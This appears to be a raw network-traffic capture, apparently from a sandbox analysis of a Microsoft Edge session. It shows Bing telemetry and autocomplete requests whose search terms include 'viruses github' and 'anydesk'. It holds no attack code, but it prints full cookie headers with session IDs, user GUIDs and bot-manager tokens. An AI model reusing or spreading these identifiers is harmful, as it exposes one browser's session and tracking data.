User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144341.184ecd72
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144351.184ed0f0
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144351.184f1bc7
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350722%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144351.184f1d41
GET

https://www.bing.com/qbox?query=anyddes&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=e8d253d92907427684e76f05eb2f7e51&oit=1&cp=7&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=anyddes&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=e8d253d92907427684e76f05eb2f7e51&oit=1&cp=7&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 200 OK

Content-Length: 266
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 67016449813c404da36d038e65006d8b
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-1epoLLtr5/G48704/wnfe79iBmsjSA6IzW4N1I+qPw0='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:07:37 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:07:37 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=SID=0F1DDA699A6769020C5DCF669BA2680B; domain=.bing.com; path=/; HttpOnly
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; domain=.bing.com; expires=Thu, 30-Oct-2025 16:07:37 GMT; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144457.184f1e43
GET

https://www.bing.com/qbox?query=anyddesk&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=3b1307b24f4241d9a367b37ccea69d11&oit=1&cp=8&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=anyddesk&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=3b1307b24f4241d9a367b37ccea69d11&oit=1&cp=8&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 200 OK

Content-Length: 267
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 6701644977694f0a8973e774fdc15b7d
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ltwgXMFWL7gjy/cHHF8AyIS393gPAsfsGPFg977GYcE='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:07:37 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:07:37 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=SID=218C3ED9DA45639E23A12BD6DBE56247; domain=.bing.com; path=/; HttpOnly
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; domain=.bing.com; expires=Thu, 30-Oct-2025 16:07:37 GMT; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144457.18524357
GET

